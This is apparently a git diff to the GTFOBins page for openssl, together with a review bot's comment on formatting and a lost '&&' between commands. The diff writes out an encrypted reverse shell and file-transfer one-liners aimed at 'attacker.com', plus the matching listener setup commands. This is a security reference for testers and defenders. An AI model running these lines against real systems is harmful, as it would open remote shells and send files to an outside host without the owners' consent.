diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index 5c7721c..e3e77d0 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md 
@@ -1,20 +1,38 @@ --- functions: reverse-shell: - - description: Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345` on the attacker box to receive the shell. Communication between attacker and target will be encrypted. + - description: | + To receive the shell run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 + + Communication between attacker and target will be encrypted. code: | RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s file-upload: - - description: Send a file to a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save` on the attacker box to collect the file. + - description: | + To collect the file run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save + + Send a file to a TCP port, transmission will be encrypted. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE" file-download: - - description: Fetch a file from a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send` on the attacker box to send the file. 
+ - description: | + To send the file run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send + + Fetch a file from a TCP port, transmission will be encrypted. code: | RHOST=attacker.com RPORT=12345
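Review bot: in the new file-upload and file-download descriptions the summary sentence ("Send a file to a TCP port, transmission will be encrypted." and "Fetch a file from a TCP port, transmission will be encrypted.") now comes after the listener commands, so each entry opens with setup steps before saying what the function does. Move the summary back to the first line of each block, as in the old one-line descriptions. Separately, all three old descriptions joined the two commands with `&&`, and the split onto two lines drops that dependency: as written, the `openssl s_server` line reads as an independent step even though it needs the key.pem and cert.pem that `openssl req` produces. Either keep `&&` at the end of the first command line or state in the lead-in sentence that the second command depends on the first succeeding.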